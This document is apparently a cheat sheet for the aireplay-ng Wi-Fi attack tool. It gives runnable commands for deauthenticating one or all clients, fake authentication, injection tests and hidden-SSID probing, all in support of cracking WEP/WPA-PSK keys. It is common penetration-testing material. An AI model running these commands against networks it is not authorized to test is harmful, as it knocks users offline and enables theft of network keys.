Used to inject/replay frames. Generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys.
Aireplay-ng has many attacks that can de-authenticate wireless clients for the purpose of capturing WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection, and ARP-request re-injection.
Disconnect a client
This can be used when looking for hidden SSID with airodump.
# -0: send a disconnect signal. The number that follows is the amount of requests
# that it should send.
# Need network BSSID and client BSSID
# MAC/physical address
BSSID="00:00:00:00:00:00"
CLIENT="11:11:11:11:11:11"
INTERFACE="wlan1"
aireplay-ng -0 15 -c "$CLIENT" -a "$BSSID" "$INTERFACE"Deauthenticate (disconnect) all clients
# If problem with channel (5 is channel number): airmon-ng start wlan1 5
# MAC/physical address
BSSID="00:00:00:00:00:00"
INTERFACE="wlan1"
aireplay-ng -0 1 -a "$BSSID" wlan1Check if network card supports injection
# rfkill list, then rfkill unblock IDENTIFIER
INTERFACE="wlan1"
aireplay-ng -9 "$INTERFACE"Check a hidden SSID or check a specific SSID
# -a: Access point MAC address
# -e: Target SSID
# MAC/physical address
MAC="00:00:00:00:00:00"
SSID="WIFI_NETWORK_NAME"
INTERFACE="wlan1"
aireplay-ng --test -e "$SSID" -a "$MAC" "$INTERFACE"Run the deauthentication attack
Run the deauthentication attack (-0), sending 5 packets to the wireless access point to deauthenticate a wireless client via the monitor mode interface.
MAC="00:00:00:00:00:00"
CLIENT="mac address of client"
INTERFACE="wlan1"
aireplay-ng -0 5 -a "$MAC" -c "$CLIENT" "$INTERFACE"Run the fake authentication attack
Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point with the given SSID, specifying our mac address using monitor mode interface wlan1.
SSID="WIFI_NETWORK_NAME"
MAC="00:00:00:00:00:00"
MYMAC="22:22:22:22:22:22"
INTERFACE="wlan1"
aireplay-ng -1 6000 -e "$SSID" -a "$MAC" -h "$MYMAC" "$INTERFACE"